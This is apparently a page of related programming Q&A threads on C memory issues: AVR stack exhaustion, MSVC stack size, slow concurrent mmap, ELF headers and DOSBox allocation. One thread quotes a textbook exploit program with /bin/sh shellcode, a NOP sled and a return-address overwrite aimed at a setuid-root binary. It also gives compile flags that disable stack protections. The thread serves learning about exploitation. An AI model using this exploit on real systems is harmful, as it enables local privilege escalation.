AVR/GNU C Compiler and static memory allocation

Update - rephrased question:
Now that I know what the bug is: how can I tell at compile time that static allocation will fail on an embedded target?
Older:
I have this simple and easy-to-understand C code below, running on an ATmega328P-AU with 2K of SRAM. I use a well-behaved UART library (I tried many during debugging) to get debug strings in my PC terminal.
There is a bug in this code: It freezes. All I get is this output...
Hello World - Loading
I should get a '+' for every loop.
Can you explain why it freezes, and why the compiler does not warn me about allocating more memory than the microcontroller has?
All the info you may need is in the code.
/**************************************************************************************************
Info
**************************************************************************************************/
/*
Device: Atmega328P-AU - No arduino
IDE: Atmel Studio 6.2
Compiler: AVR/GNU C Compiler : 4.8.1
F_CPU: 8000000 Hz defined in makefile
Fuses:
Extended: 0x07
High: 0xD9
Low: 0xE2
Lockbit: 0xFF
When compiled, the build output shows:
text data bss dec hex filename
1088 0 57 1145 479 Bug Catcher.elf
Done executing task "RunCompilerTask".
Task "RunOutputFileVerifyTask"
Program Memory Usage : 1088 bytes 3,3 % Full
Data Memory Usage : 57 bytes 2,8 % Full
Done executing task "RunOutputFileVerifyTask".
Done building target "CoreBuild" in project "Bug Catcher.cproj".
Target "PostBuildEvent" skipped, due to false condition; ('$(PostBuildEvent)' != '') was evaluated as ('' != '').
Target "Build" in file "C:\Program Files\Atmel\Atmel Studio 6.2\Vs\Avr.common.targets" from project "C:\Users\Tedi\Desktop\Bug Catcher\Bug Catcher\Bug Catcher.cproj" (entry point):
Done building target "Build" in project "Bug Catcher.cproj".
Done building project "Bug Catcher.cproj".
Build succeeded.
========== Rebuild All: 1 succeeded, 0 failed, 0 skipped ==========
*/
/**************************************************************************************************
Definitions
**************************************************************************************************/
#define BIG_NUMBER 1000
// Atmega328P - Pin 12
#define SOFT_UART_RX_DDR DDRB
#define SOFT_UART_RX_DDR_bit DDB0
#define SOFT_UART_RX_PORT PORTB
#define SOFT_UART_RX_PORT_bit PORTB0
#define SOFT_UART_RX_PIN PINB
#define SOFT_UART_RX_PIN_bit PINB0
// Atmega328P Pin 13
#define SOFT_UART_TX_DDR DDRB
#define SOFT_UART_TX_DDR_bit DDB1
#define SOFT_UART_TX_PORT PORTB
#define SOFT_UART_TX_PORT_bit PORTB1
#define SOFT_UART_TX_PIN PINB
#define SOFT_UART_TX_PIN_bit PINB1
/**************************************************************************************************
Includes
**************************************************************************************************/
#include "softuart.h"
#include <avr/io.h>
#include <avr/interrupt.h>
#include <util/delay.h>
#include <string.h>
/**************************************************************************************************
Main function
**************************************************************************************************/
int main()
{
/**********************************************************************************************
Setup
**********************************************************************************************/
softuart_init( &SOFT_UART_TX_DDR, SOFT_UART_TX_DDR_bit,
&SOFT_UART_TX_PORT, SOFT_UART_TX_PORT_bit,
&SOFT_UART_RX_DDR, SOFT_UART_RX_DDR_bit,
&SOFT_UART_RX_PIN, SOFT_UART_RX_PIN_bit );
sei();
softuart_puts_P( "\r\n\r\nHello World - Loading\r\n\r\n" ); // Can use custom UART function.
_delay_ms( 200 );
/**********************************************************************************************
Forever loop
**********************************************************************************************/
while(1)
{
char temp[BIG_NUMBER];
memset( temp, '\0', sizeof( temp ) );
{
char temp[BIG_NUMBER];
memset( temp, '\0', sizeof( temp ) );
{
char temp[BIG_NUMBER];
memset( temp, '\0', sizeof( temp ) );
}
}
softuart_puts_P("+"); // BUG!!!!! It never reaches here.
_delay_ms( 500 );
}
}

The linker allocates the static storage, in your case 57 bytes (data plus bss segments). So as long as a too-big variable has static storage, you will see an error message from the linker.
The variable temp[1000] is an automatic variable: it is allocated at run time, on the stack. The RAM that is not statically allocated by the linker is used for the stack. Your bug is an easy case, because the three nested arrays together are bigger than the entire RAM of the device, but normally this kind of error is really, really hard to detect: you only see it fail when the offending function is actually called. One solution is to check the available stack space at runtime. As a simple rule: don't allocate big stuff on the stack.
temp[1000] is alive for the entire runtime of the program, so you don't lose anything by moving it into static storage. Put "static" in front of it and you will (hopefully) see an error message from the linker.

Related

Change stack size in VSCode

I would like to declare and initialize a large 3D array on the stack. The C function declares the large 3D array as:
#define NMATS 36
#define ROWS 10000
#define COLS 9
void myfunc(void)
{
double mat[NMATS][ROWS][COLS];
// Initialize later ...
}
In VS Code, the command cl.exe /Zi /EHsc /Fe: C:\Users\usr\project\c\build\main.exe c:\Users\usr\project\c\src\main.c successfully builds the code. However, during runtime I get the error:
Unable to open 'chkstk.asm': File not found.
This indicates that my Stack Reserve Size is too small. However, I am relatively new to VS Code and would like to know how to increase the stack reserve size and specify the option for cl.exe.
As mentioned in the comments, do a dynamic allocation so you don't have to rely on compiler switches and architecture limitations:
#include <stdlib.h>

#define NMATS 36
#define ROWS 10000
#define COLS 9

typedef double MAT[NMATS][ROWS][COLS];

void myfunc(void)
{
    MAT* mat = malloc(sizeof(MAT));
    if (mat == NULL)
        return; // allocation failed
    // initialize the matrix by referencing it as `*mat`
    (*mat)[0][0][0] = 0;
    free(mat);
}
But if you insist on needing a stack allocation:
Assuming sizeof(double) == 8, 36*10000*9*sizeof(double) == 25,920,000. So you'd need at least that many bytes of stack space, plus a little more for function-call and local-variable overhead. Let's add another million bytes and round up to 27 million.
If you really insist on having 27 MB of stack available, and assuming you are using the Microsoft compiler:
Set the linker option: /STACK:27000000
The above works for all Visual Studio projects.
If your custom build step is just a single run of cl.exe (and not a separate linker step), you can have the compiler set the stack size via the /F compiler option:
cl.exe /F27000000 /Zi /EHsc /Fe: C:\Users\usr\project\c\build\main.exe c:\Users\usr\project\c\src\main.c
https://learn.microsoft.com/en-us/cpp/build/reference/f-set-stack-size?view=msvc-170
https://learn.microsoft.com/en-us/cpp/build/reference/stack-stack-allocations?view=msvc-170

Poor `mmap` performance on substantial system load

We're currently facing a somewhat complex problem with mmap performance on our Linux server.
We use a server with a 64-core AMD Opteron 6374 and 128 GiB of RAM. On it, we created a QEMU virtual machine with the same core count and 64 GiB of RAM, which we use for unit-testing a program I wrote. There are around 60 unit tests that run in parallel, each of which allocates a little over 1 GiB of RAM. Because the process memory compresses really well, we decided to enable zram. During our tests, the memory usage dropped to around 300 MiB per process, which is a significant gain at a relatively small performance loss (the swap area stays in physical memory).
Currently our tests don't swap just yet, but we've observed very poor mmap performance. A single call to mmap could, in our testing, take up to 7 minutes (without swapping, of course; the process allocates maybe somewhere between 2 MB/s and 20 MB/s). Sometimes, though, all the mmaps in all 60 processes are nearly instant and the processes allocate the required gigabyte of RAM right away. Most of the time we watch them allocate tiny amounts of memory per second in real time.
The program I wrote follows:
// CC0, inspired by dzaima's code, which was inspired by my code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <unistd.h>
#define u8 uint8_t
#define i32 int32_t
#define u32 uint32_t
#define i64 int64_t
#define u64 uint64_t
#define C const
#define P static
#define _(a...) {return({a;});}
#define F_(n,a...) for(int i=0;i<n;i++){a;}
#define F1(n,x,a...) for(i32 i=0;i<n;i+=x){a;}
#define INLINE P inline __attribute__((always_inline))
#define assert(X) if(!(X))__builtin_unreachable();
#define LKL(c) __builtin_expect((c),1)
typedef u32 W;
#define SZ 19
#define END 1162261467ULL
P C u8 crz[]={1,0,0,9,1,0,2,9,2,2,1},crz2[]={4,3,3,1,0,0,1,0,0,9,9,9,9,9,9,9,4,3,5,1,0,2,1,0,2,9,9,9,9,9,9,9,5,5,4,2,2,1,2,2,1,9,9,9,9,9,9,9,4,3,3,1,0,0,7,6,6,9,9,9,9,9,9,9,4,3,5,1,0,2,7,6,8,9,9,9,9,9,9,9,5,5,4,2,2,1,8,8,7,9,9,9,9,9,9,9,7,6,6,7,6,6,4,3,3,9,9,9,9,9,9,9,7,6,8,7,6,8,4,3,5,9,9,9,9,9,9,9,8,8,7,8,8,7,5,5,4,9,9,9,9,9,9,9};
#define UNR_CRZ(trans,sf1,sf2)W am=a%sf1,ad=a/sf1,dm=d%sf1,dd=d/sf1;r+=k*trans[am+sf2*dm];a=ad;d=dd;k*=sf1;
INLINE W mcrz(W a, W d){W r=0,k=1;
#pragma GCC unroll 16
F_(SZ/2,UNR_CRZ(crz2,9,16))if(SZ&1){UNR_CRZ(crz,3,4)}return r;}
INLINE W mrot(W x)_(W t=END/3,b=x%t,m=b%3,d=b/3;d+m*(t/3)+(x-b))
P u64 pgsiz;
P W*mem,pat[6];
P void mpstb(void*b,u64 l){mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
P void sigsegvh(int n,siginfo_t*si,void*_) {
void*a=si->si_addr,*ab=(void*)((u64)a&~(pgsiz-1));mpstb(ab, pgsiz);
W* curr=ab;i64 off=(curr-mem)%(END/3);F1(pgsiz,sizeof(W),*curr++=pat[off++%6]);}
P u64 rup(u64 v)_(((v-1)&~(pgsiz-1))+pgsiz)
#define RDS 65536
__attribute__((hot,flatten))int main(int argc, char* argv[]){
pgsiz=sysconf(_SC_PAGESIZE);mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
struct sigaction act;memset(&act,0,sizeof(struct sigaction));act.sa_flags=SA_SIGINFO;act.sa_sigaction=sigsegvh;sigaction(SIGSEGV,&act,NULL);
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));char data[RDS];
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
W n2=mem[off-2],n1=mem[off-1];u64 off2=off;F_(6,W n0=mcrz(n1,n2);pat[off2%6]=n0;n2=n1;n1=n0;off2++)W c=0,a=0,*d=mem;
P C int offs[]={0,((i64)a1_off-(i64)(END/3))%94+94,((i64)a2_off-(i64)(2*(END/3))%94+94)};P C void*j[94];F_(94,j[i]=&&INS_DEF)
#define M(n) j[n]=&&INS_##n;
M(4)M(5)M(23)M(39)M(40)M(62)M(68)M(81)
#define BRA {goto*j[(c+mem[c]+offs[c/(END/3)])%94];}
BRA;
#define NXT mem[c] = \
"SOMEBODY MAKE ME FEEL ALIVE" \
"[hj9>,5z]&gqtyfr$(we4{WP)H-Zn,[%\\3dL+Q;>U!pJS72FhOA1CB6v^=I_0/8|jsb9m<.TVac`uY*MK'X~xDl}REokN:#?G\"i#" \
"AND SHATTER ME"[mem[c]];c++;d++;BRA
INS_4:c=*d;NXT;INS_5:putchar(a);fflush(stdout);NXT;
INS_23:;int CR=getchar();a=CR==EOF?END-1:CR;NXT;INS_39:a=*d=mrot(*d);NXT;INS_40:d=mem+*d;NXT;
INS_62:a=*d=mcrz(a, *d);INS_68:NXT;INS_81:return 0;INS_DEF:NXT;
}
It's an interpreter for the rotwidth=19 variant of Malbolge Unshackled (compiled with clang fast20.c -w -O3 -march=native -mtune=native -o fast20 -flto -mllvm -polly -fvisibility=hidden; clang -v yields Debian clang version 11.0.1-2). We feed it the source code of my project (passed as an argument to the program), temporarily available here (provided in the hope that our issue can be reproduced; use 7za to unpack).
Each time I want to run the unit tests, I execute the following shell script:
#!/bin/bash
# XXX: `rsync` is slower
echo "[+] sending test data."
cd kiera-tests && \
tar -czf - * | \
ssh kamila@remote \
"cd ~/malbolgelisp && rm -rf tests && mkdir tests && cd tests && tar -xzf -" && \
cd ..
echo "[+] building essential tools."
ssh kamila@remote "cd ~/malbolgelisp/tests && chmod a+x setup.sh && ./setup.sh"
echo "[+] sending malbolgelisp source code..."
tool/mb_nlib d < lisp.mb | \
pv | gzip -6 | \
ssh kamila@remote \
"gunzip | ~/malbolgelisp/tests/mb_nlib e > ~/malbolgelisp/lisp.mb && vmtouch -vt ~/malbolgelisp/lisp.mb"
echo "[+] running the tests..."
ssh kamila@remote "cd ~/malbolgelisp/tests/ && ./test.sh"
I vmtouch the ~300MB file, so it must have stayed in cache across the runs.
/home/kamila/malbolgelisp/lisp.mb
[OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO] 76711/76711
Files: 1
Directories: 0
Touched Pages: 76711 (299M)
Elapsed: 0.071541 seconds
As we've observed, the cached memory shown by bpytop grows up to 500MiB, which means that the file must have been cached. We also reupload the file each time and it changes significantly.
We tried using Valgrind on the interpreter, but it seems to misbehave under this condition for a yet unknown reason. It's easy to deduce what is happening in the code, though:
pgsiz=sysconf(_SC_PAGESIZE);
mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
first, the entire memory area is mapped.
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);
u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));
then I query the file size (~300 MiB; times sizeof(W), that's ~1.2 GiB) and eagerly map that amount of memory using mpstb:
P void mpstb(void*b,u64 l){
mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
I considered using mprotect, but in the following parts of the code we execute mpstb fairly often, causing IPIs for TLB shootdowns.
the following bit of code can't be a bottleneck either: aside from the I/O it performs (on a cached file, with a relatively big buffer - RDS = 65536 - so it should be fast), it is just a bunch of mathematical operations, which can't take 7 minutes on one run and a few seconds on another run with the same data:
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;
while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}
for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
We've also noticed that in the following test runner which is executed on the server:
#!/bin/bash
for d in b*; do
for f in $d/*.in; do
echo "[+] $f"
(./fast20 ../lisp.mb $f < $f > $f.aout; diff ${f%%.*}.out $f.aout) &
# sleep 3s
done
for job in `jobs -p`; do
wait $job
done
done
uncommenting the # sleep 3s line makes the allocations much faster, which suggests the Linux kernel simply can't handle dozens of processes each mapping a gigabyte of memory concurrently. We've also seen messages like watchdog: BUG: soft lockup - CPU#34 stuck for 24s! pop up during testing, which messed up our bpytop view. Some googling reveals that this is printed when a CPU is stuck in the kernel for too long, which is yet another argument that mmap in this example is ridiculously slow.
We've also suspected memory ballooning in QEMU, but disabling it made very little difference.
Interestingly enough, all the processes seem to allocate memory slowly and concurrently.
The documentation for the lisp interpreter is available here, and it can be used to construct test cases - the simplest one being (+ 2 2).
My question follows: can we do something about this? Are we missing something? I know that running fewer processes at a time makes it bearable (the runtime drops from 30m to 5m), but were it not for the allocation performance, the tests could easily finish within 40 seconds, which would be a huge improvement. Is mmap inherently slow on Linux when called by multiple processes concurrently?
Finally, please let me know if we should provide any further details.

How can I access interpreter path address at runtime in C?

By using the objdump command I figured out that the address 0x02a8 in memory contains the start of the path /lib64/ld-linux-x86-64.so.2, and that this path is terminated by a 0x00 byte, as C strings are.
So I tried to write a simple C program that will print this string (I used a sample from the book "RE for beginners" by Denis Yurichev - page 24):
#include <stdio.h>
int main(){
printf(0x02a8);
return 0;
}
But I was disappointed to get a segmentation fault instead of the expected /lib64/ld-linux-x86-64.so.2 output.
I find it strange to call printf in such a bare way, without format specifiers or at least a pointer cast, so I tried to make the code more natural:
#include <stdio.h>
int main(){
char *p = (char*)0x02a8;
printf(p);
printf("\n");
return 0;
}
And after running this I still got a segmentation fault.
I don't believe this is happening because of restricted memory areas, because in the book it all works on the first try. I am not sure; maybe there is something more that wasn't mentioned in the book.
So I need a clear explanation of why the segmentation fault keeps happening every time I run the program.
I'm using the latest fully-upgraded Kali Linux release.
It's disappointing to see that your "RE for beginners" book does not cover the basics first and spits out this nonsense. Nonetheless, what you are doing is wrong; let me explain why.
Normally on Linux, GCC produces ELF executables that are position-independent. This is done for security purposes: when the program is run, the operating system is able to place it anywhere in memory (at any address), and the program will work just fine. That random placement is known as Address Space Layout Randomization (ASLR), an operating-system feature that is nowadays enabled by default.
Normally, an ELF program would have a "base address" and would be loaded at exactly that address in order to work. In the case of a position-independent ELF, however, the "base address" is set to 0x0, and the operating system and the interpreter decide where to put the program at runtime.
When you use objdump on a position-independent executable, every address you see is not a real address but an offset from the base of the program (which will only be known at runtime). Therefore it is not possible to know the position of such a string (or any other variable) ahead of time.
If you want the above to work, you will have to compile an ELF that is not position independent. You can do so like this:
gcc -no-pie -fno-pie prog.c -o prog
It no longer works like that. The 64-bit Linux executables you're likely using are position-independent and are loaded into memory at an arbitrary address; in that case the ELF file does not contain any fixed base address.
While you could make a position-dependent executable as instructed by Marco Bonelli, that is not how things work for arbitrary executables on modern 64-bit Linux systems, so it is more worthwhile to learn to do this with position-independent ones - but it is a bit trickier.
The following worked for me to print "ELF" (i.e. the ELF header magic) and the interpreter string. It is dirty in that it probably only works for a small executable anyway:
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
int main(){
// convert main to uintptr_t
uintptr_t main_addr = (uintptr_t)main;
// clear bottom 12 bits so that it points to the beginning of page
main_addr &= ~0xFFFLLU;
// subtract one page so that we're in the elf headers...
main_addr -= 0x1000;
// elf magic
puts((char *)main_addr);
// interpreter string, offset from hexdump!
puts((char *)main_addr + 0x318);
}
There is another trick to find the beginning of the ELF executable in memory: the so-called auxiliary vector and getauxval:
The getauxval() function retrieves values from the auxiliary vector,
a mechanism that the kernel's ELF binary loader uses to pass certain
information to user space when a program is executed.
The location of the ELF program headers in memory will be:
#include <sys/auxv.h>
char *program_headers = (char*)getauxval(AT_PHDR);
The actual ELF header is 64 bytes long and the program headers start at byte 64, so if you subtract 64 from this value you get a pointer to the magic string again. Our code can therefore be simplified to:
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main(){
char *elf_header = (char *)getauxval(AT_PHDR) - 0x40;
puts(elf_header + 0x318); // or whatever the offset was in your executable
}
And finally, here is an executable that figures out the interpreter position from the ELF headers alone, provided you've got a 64-bit ELF (magic numbers from Wikipedia):
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main() {
// get pointer to the first program header
char *ph = (char *)getauxval(AT_PHDR);
// elf header at this position
char *elfh = ph - 0x40;
// segment type 0x3 is the interpreter;
// program header item length 0x38 in 64-bit executables
while (*(uint32_t *)ph != 3) ph += 0x38;
// the offset is 64 bits at 0x8 from the beginning of the
// executable
uint64_t offset = *(uint64_t *)(ph + 0x8);
// print the interpreter path...
puts(elfh + offset);
}
I guess it segfaults because of the way you use printf: you don't use the format parameter the way it is designed to be used.
The first argument printf takes is a format string that controls how the output is rendered: int printf(const char *fmt, ...). The ... represents the data you want to display according to that format string.
So if you want to print a string:
// format as text
printf("%s\n", pointer_to_beginning_of_string);
If this still does not work (though it probably will), it is because you are trying to read memory that you are not supposed to access.
Try adding the extra flags -Werror -Wextra -Wall -pedantic to your compiler invocation and show us the errors, please.

Why do I get a segmentation fault in the exploit_notesearch program from "Hacking: The Art of Exploitation"?

So, to start off with, I am on Kali 2020.1, fully updated. 64 bit.
The source code is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "hacking.h"
#include <unistd.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
long int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (long int) &i - offset; // Set return address.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
Now, some important clarifications. I included all those headers because compilation throws warnings without them.
The preceding notetaker and notesearch programs, as well as this exploit_notesearch program have been compiled as follows in the Terminal:
gcc -g -mpreferred-stack-boundary=4 -no-pie -fno-stack-protector -Wl,-z,norelro -z execstack -o exploit_notesearch exploit_notesearch.c
I no longer remember the source that said I must compile this way (the preferred stack boundary was 2 for them, but my machine requires it to be between 4 and 12). Also, the stack is executable now, as you can see.
All 3 programs (notetaker, notesearch, and exploit_notesearch) had their permissions modified as in the book:
sudo chown root:root ./program_name
sudo chmod u+s ./program_name
I tried following the solution from this link: Debugging Buffer Overflow Example , but to no avail. Same goes for this link: Not So Fast Shellcode Exploit
Changing the offset incrementally from 0 to 330 by using increments of 1, 10, 20, and 30 in the terminal using a for-loop also did not solve my problem. I keep getting a segmentation fault no matter what I do.
What could be the issue in my case and what would be the best way to overcome said issue? Thank you.
P.S I remember reading that I'm supposed to use 64-bit shellcode instead of the one provided.
When you are segfaulting, it is a great time to run it within a debugger like GDB. It should tell you right where you are crashing, and you can step through the execution and validate the assumptions you are making. The most common segfaults tend to be invalid memory permissions (like trying to execute a non-executable page) or an invalid instruction (eg., if you land in the middle of shellcode, not in a NOP sled).
You are running into a couple of issues from trying to run an exploit written for 32-bit on a 64-bit system. When filling the buffer with return addresses, the code uses the constant 4, while pointers on 64-bit are actually 8 bytes.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
That could also present some issues when trying to exploit the strcpy bug, because those 64-bit addresses will contain NULL bytes (since the usable address space only uses 6 of the 8 bytes). Thus, if you have some premature NULL bytes before actually overwriting the return address on the stack, you won't actually copy enough data to leverage the overflow as intended.

How do I properly allocate a memory buffer to apply double buffering in dosbox using turbo c?

Okay, so I am trying to apply a double-buffering technique in an emulated environment (DOSBox) using the Turbo C++ 3.0 IDE. I am running Windows 7 64-bit (not sure if that matters), and I have no clue how to properly execute the buffering routine in this environment.
The main problem I am having is that I can't seem to execute the following assignment statement:
double_buffer = (byte_t far*)farmalloc((unsigned long)320*200);
(Note that 320 and 200 are the screen dimensions.)
I just get NULL back from the assignment.
I tried changing the default RAM of DOSBox from 16 to 32, but that didn't do anything. I'm not sure if it's the emulator or something wrong with the Turbo C code. (Note that it compiles just fine.)
Here is a sample program I found online:
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <dos.h>
#include <string.h>
#include <alloc.h>
typedef unsigned char byte_t;
byte_t far* video_buffer = (byte_t far*)0xA0000000;
void vid_mode(byte_t mode){
union REGS regs;
regs.h.ah = 0;
regs.h.al = mode;
int86(0x10,&regs,&regs);
}
void blit(byte_t far* what){
_fmemcpy(video_buffer,what,320*200);
}
int main(){
int x,y;
byte_t far* double_buffer;
double_buffer = (byte_t far*)farmalloc((unsigned long)320*200);
if(double_buffer == NULL){
printf("sorry, not enough memory.\n");
return 1;
}
_fmemset(double_buffer,0,(unsigned long)320*200);
vid_mode(0x13);
while(!kbhit()){
x = rand()%320;
y = rand()%200;
double_buffer[y * 320 + x] = (byte_t)(rand()%256);
blit(double_buffer);
}
vid_mode(0x03);
farfree(double_buffer);
return 0;
}
Your problem is related to running your application inside the Turbo C IDE debugger. If you compile it, exit the IDE, and run it directly from the DOSBox command line, it should work as expected.
When running via the IDE, the default debug option allocates only an additional 64 KiB of memory for your program's heap. That isn't enough to satisfy your request for 64000 bytes (320*200). In the Turbo C IDE, pull down the Options menu and click on Debugger to open the debugger options dialog.
The default value for Program Heap Size is 64. Change it to the maximum, 640, and click OK. Rerun your program and it should display randomly colored pixels at random locations.
